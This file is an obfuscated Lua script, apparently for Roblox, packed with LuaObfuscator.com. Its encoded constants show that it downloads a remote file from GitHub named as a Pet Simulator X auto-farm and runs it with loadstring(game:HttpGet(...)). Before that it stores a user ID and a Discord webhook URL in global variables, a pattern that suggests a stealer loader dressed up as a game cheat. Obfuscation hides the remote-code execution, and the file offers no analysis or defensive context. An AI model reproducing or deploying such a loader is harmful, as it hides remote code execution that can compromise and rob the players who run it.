--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=0;local v76;while true do if (v75==1) then return v76;end if (v75==0) then v76=v5(v69,v19);v19=nil;v75=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -(878 -(282 + 595))))) + (620 -(555 + (1701 -(1523 + 114)))))) ;return v70-(v70%(932 -(857 + 67 + 7))) ;else local v71=(570 -((523 -156) + 201))^(v32-(928 -((1279 -(68 + 997)) + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37=117 -(32 + 85) ;local v38;local v39;local v40;local v41;while true do if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;v37=958 -(892 + 65) ;end if (v37==(2 -1)) then return (v41 * (16777566 -(87 + 263))) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end end end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + (791 -(368 + 423)) ,49 -(90 -61) ) * (2^(24 + 8))) + v42 ;local v46=v20(v43,83 -62 ,983 -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -(18 -(10 + 8)))) and  -(1 + 0)) or 1 ;if (v46==(997 -(915 + 82))) then if (v45==0) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-((6989 -5172) -794) ) * (v44 + (v45/(2^(52 + 0)))) ;end local function v25(v48)local v49=442 -(416 + 26) ;local v50;local v51;while true do if (0==v49) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1 + 0 ;end if (v49==(775 -(201 + 571))) then return v6(v51);end if (v49==(3 -1)) then v51={};for v77=(1577 -(116 + 1022)) -(145 + 293) , #v50 do v51[v77]=v2(v1(v3(v50,v77,v77)));end v49=433 -(44 + 386) ;end if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=2 + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52==2) then v57=nil;v58=nil;v52=3;end if (v52~=(1446 -(1290 + 155))) then else v55=nil;v56=nil;v52=2;end if (v52==4) then v61=nil;while true do if (v53==(3 -1)) then v58=nil;v59=nil;v53=1 + 2 ;end if (v53==4) then while true do if (v54==(0 -0)) then local v104=65 -(30 + 35) ;while true do if (v104==(1 + 0)) then v54=1;break;end if (v104==(1257 -(1043 + 214))) then v55=0;v56=nil;v104=3 -2 ;end end end if (v54==(1213 -(323 + 889))) then local v105=0;local v106;while true do if (v105~=(0 -0)) then else v106=580 -(361 + 219) ;while true do if (v106==0) then local v120=0;while true do if (v120==0) then v57=nil;v58=nil;v120=1;end if (v120==1) then v106=321 -(53 + 267) ;break;end end end if (v106~=1) then else v54=1 + 1 ;break;end end break;end end end if (v54==(415 -(15 + 398))) then local v107=982 -(18 + 964) ;while true do if (v107==(3 -2)) then v54=3;break;end if (v107~=0) then else local v111=0;while true do if (v111==(1 + 0)) then v107=1 + 0 ;break;end if (0==v111) then v59=nil;v60=nil;v111=851 -(20 + 830) ;end end end end end if (v54~=3) then else v61=nil;while true do local v108=0;local v109;local v110;while true do if (v108==(1 + 0)) then while true do if (v109==0) then v110=0;while true do if (v110~=1) then else if (v55~=(126 -(116 + 10))) then else local v163=0 + 0 ;local v164;local v165;while true do if (v163~=1) then else while true do if (v164==(738 -(542 + 196))) then v165=0 -0 ;while true do if (v165~=1) then else v58={};v55=1;break;end if (v165~=(0 + 0)) then else local v175=0;while true do if (v175==1) then v165=1;break;end if (v175==(0 + 0)) then v56={};v57={};v175=1 + 0 ;end end end end break;end end break;end if (v163==0) then v164=0;v165=nil;v163=2 -1 ;end end end if (v55~=1) then else local v166=0;local v167;local v168;while true do if (v166==(2 -1)) then while true do if (v167==0) then v168=1551 -(1126 + 425) ;while true do if (0~=v168) then else local v176=405 -(118 + 287) ;local v177;while true do if ((0 -0)==v176) then v177=1121 -(118 + 1003) ;while true do if (v177==(2 -1)) then v168=1;break;end if (v177==0) then local v193=0;while true do if (v193==1) then v177=378 -(142 + 235) ;break;end if (v193==0) then v59={v56,v57,nil,v58};v60=v23();v193=978 -(553 + 424) ;end end end end break;end end end if (v168~=1) then else v61={};v55=3 -1 ;break;end end break;end end break;end if (v166~=0) then else v167=0;v168=nil;v166=1;end end end break;end if (v110==(0 + 0)) then local v160=0;while true do if (v160==(0 + 0)) then if (v55~=(2 + 1)) then else local v171=0 + 0 ;while true do if (v171~=(0 + 0)) then else local v174=0;while true do if (v174~=(0 -0)) then else for v179=1,v23() do v57[v179-(2 -1) ]=v28();end return v59;end end end end end if (v55~=(4 -2)) then else local v172=0 + 0 ;local v173;while true do if (v172==(0 -0)) then v173=0;while true do if ((754 -(239 + 514))==v173) then for v181=1,v23() do local v182=0;local v183;local v184;local v185;while true do if (v182~=(1 + 0)) then else v185=nil;while true do if (v183==0) then local v194=0;while true do if (v194==(1330 -(797 + 532))) then v183=1;break;end if (v194~=(0 + 0)) then else v184=0;v185=nil;v194=1 + 0 ;end end end if ((2 -1)==v183) then while true do if (v184==(1202 -(373 + 829))) then v185=v21();if (v20(v185,732 -(476 + 255) ,1131 -(369 + 761) )~=(0 + 0)) then else local v196=0 -0 ;local v197;local v198;local v199;local v200;while true do if ((3 -1)==v196) then while true do if (v197==(241 -(64 + 174))) then if (v20(v199,1 + 2 ,3)~=1) then else v200[5 -1 ]=v61[v200[4]];end v56[v181]=v200;break;end if (v197==1) then local v207=0;while true do if ((336 -(144 + 192))==v207) then v200={v22(),v22(),nil,nil};if (v198==0) then local v215=0;local v216;local v217;local v218;while true do if (v215~=0) then else v216=0 + 0 ;v217=nil;v215=1505 -(363 + 1141) ;end if (v215~=1) then else v218=nil;while true do if (v216==(1580 -(1183 + 397))) then v217=0;v218=nil;v216=2 -1 ;end if (v216==1) then while true do if (v217~=0) then else v218=0;while true do if (v218~=(0 + 0)) then else v200[3]=v22();v200[3 + 1 ]=v22();break;end end break;end end break;end end break;end end elseif (v198==1) then v200[3]=v23();elseif (v198==(1977 -(1913 + 62))) then v200[2 + 1 ]=v23() -(2^16) ;elseif (v198==(7 -4)) then local v226=1933 -(565 + 1368) ;local v227;while true do if (v226==(0 -0)) then v227=0;while true do if (v227==0) then v200[1664 -(1477 + 184) ]=v23() -(2^(21 -5)) ;v200[4 + 0 ]=v22();break;end end break;end end end v207=857 -(564 + 292) ;end if (1==v207) then v197=2;break;end end end if (2==v197) then local v208=0;while true do if (v208~=0) then else local v214=0;while true do if (1~=v214) then else v208=1;break;end if (v214==(0 -0)) then if (v20(v199,2 -1 ,305 -(244 + 60) )==1) then v200[2]=v61[v200[2 + 0 ]];end if (v20(v199,478 -(41 + 435) ,1003 -(938 + 63) )~=(1 + 0)) then else v200[1128 -(936 + 189) ]=v61[v200[1 + 2 ]];end v214=1614 -(1565 + 48) ;end end end if (v208==(1 + 0)) then v197=1141 -(782 + 356) ;break;end end end if (0~=v197) then else local v209=0;local v210;while true do if (v209==0) then v210=267 -(176 + 91) ;while true do if (v210~=(0 -0)) then else local v219=0 -0 ;while true do if (v219==(1093 -(975 + 117))) then v210=1;break;end if (v219==(1875 -(157 + 1718))) then v198=v20(v185,2 + 0 ,3);v199=v20(v185,4,21 -15 );v219=1;end end end if (v210~=(3 -2)) then else v197=1019 -(697 + 321) ;break;end end break;end end end end break;end if (v196==(0 -0)) then local v204=0;while true do if (v204==0) then v197=0;v198=nil;v204=1 -0 ;end if (v204~=(2 -1)) then else v196=1 + 0 ;break;end end end if (v196~=(1 -0)) then else local v205=0 -0 ;while true do if (v205~=1) then else v196=1229 -(322 + 905) ;break;end if (v205==(611 -(602 + 9))) then v199=nil;v200=nil;v205=1190 -(449 + 740) ;end end end end end break;end end break;end end break;end if (v182==(872 -(826 + 46))) then v183=947 -(245 + 702) ;v184=nil;v182=3 -2 ;end end end v55=1 + 2 ;break;end if (v173==(1898 -(260 + 1638))) then local v178=0;while true do if (v178~=(441 -(382 + 58))) then else v173=3 -2 ;break;end if (v178==(0 + 0)) then for v187=1,v60 do local v188=0;local v189;local v190;local v191;local v192;while true do if (v188~=(0 -0)) then else v189=0 -0 ;v190=nil;v188=1;end if (v188~=(1207 -(902 + 303))) then else while true do if (v189==(0 -0)) then local v195=0 -0 ;while true do if ((1 + 0)==v195) then v189=1;break;end if (v195==0) then v190=0;v191=nil;v195=1;end end end if (v189==1) then v192=nil;while true do if (v190==(1690 -(1121 + 569))) then local v201=0;local v202;while true do if (v201==(214 -(22 + 192))) then v202=683 -(483 + 200) ;while true do if (v202~=(1463 -(1404 + 59))) then else local v211=0;while true do if (v211~=(2 -1)) then else v202=1 -0 ;break;end if (v211==0) then v191=v21();v192=nil;v211=1;end end end if (v202~=1) then else v190=766 -(468 + 297) ;break;end end break;end end end if (v190==(563 -(334 + 228))) then if (v191==(3 -2)) then v192=v21()~=(0 -0) ;elseif (v191==(2 -0)) then v192=v24();elseif (v191==3) then v192=v25();end v61[v187]=v192;break;end end break;end end break;end if (v188==1) then v191=nil;v192=nil;v188=2;end end end v59[1 + 2 ]=v21();v178=1;end end end end break;end end end v160=237 -(141 + 95) ;end if (v160==1) then v110=1 + 0 ;break;end end end end break;end end break;end if (0==v108) then v109=0 -0 ;v110=nil;v108=2 -1 ;end end end break;end end break;end if (0==v53) then local v95=0;while true do if (v95==1) then v53=1;break;end if (v95~=(0 + 0)) then else v54=0 -0 ;v55=nil;v95=1;end end end if (v53==3) then local v96=0 + 0 ;while true do if (v96~=(1 + 0)) then else v53=5 -1 ;break;end if (v96==0) then v60=nil;v61=nil;v96=1;end end end if (v53==(1 + 0)) then local v97=163 -(92 + 71) ;while true do if (v97==1) then v53=1 + 1 ;break;end if (0==v97) then v56=nil;v57=nil;v97=1 -0 ;end end end end break;end if (v52==3) then v59=nil;v60=nil;v52=4;end if (0~=v52) then else v53=765 -(574 + 191) ;v54=nil;v52=1 + 0 ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==2) then for v157=v113,v84 do local v158=0;while true do if (v158==0) then v116=v116 + 1 ;v89[v157]=v114[v116];break;end end end break;end if (v112==1) then v84=(v115 + v113) -1 ;v116=0;v112=2;end if (v112==0) then v113=v91[2];v114,v115=v82(v89[v113](v13(v89,v113 + 1 ,v91[3])));v112=1;end end elseif (v92==1) then local v121=0;local v122;while true do if (v121==0) then v122=v91[2];v89[v122]=v89[v122](v13(v89,v122 + 1 ,v84));break;end end else local v123=v91[2];local v124=v89[v91[3]];v89[v123 + 1 ]=v124;v89[v123]=v124[v91[4]];end elseif (v92<=3) then v89[v91[2]]=v64[v91[3]];elseif (v92>4) then do return;end else v83=v91[3];end elseif (v92<=8) then if (v92<=6) then v89[v91[2]]=v91[3]~=0 ;elseif (v92>7) then local v129;local v130,v131;local v132;local v133;v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v132=v89[v91[3]];v89[v133 + 1 ]=v132;v89[v133]=v132[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v130,v131=v82(v89[v133](v13(v89,v133 + 1 ,v91[3])));v84=(v131 + v133) -1 ;v129=0;for v154=v133,v84 do v129=v129 + 1 ;v89[v154]=v130[v129];end v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v89[v133]=v89[v133](v13(v89,v133 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else v89[v91[2]]=v91[3];end elseif (v92<=10) then if (v92==9) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end elseif (v92==11) then v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]]();end v83=v83 + 1 ;break;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756103023O005F4703063O00557365724944022O00F0340253F04103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O352O323338352O3835332O34393834392F34704C574E4668485279784963596C5138446443712O643174587462636C374C6158594B5057424D5046585738365055656875637147544C37543533524D47744153426200153O0012073O00013O0026093O000C00010002002O043O000C0001001203000100033O001208000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026093O000100010001002O043O00010001001203000100073O00300A00010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O00053O00017O00",v9(),...);
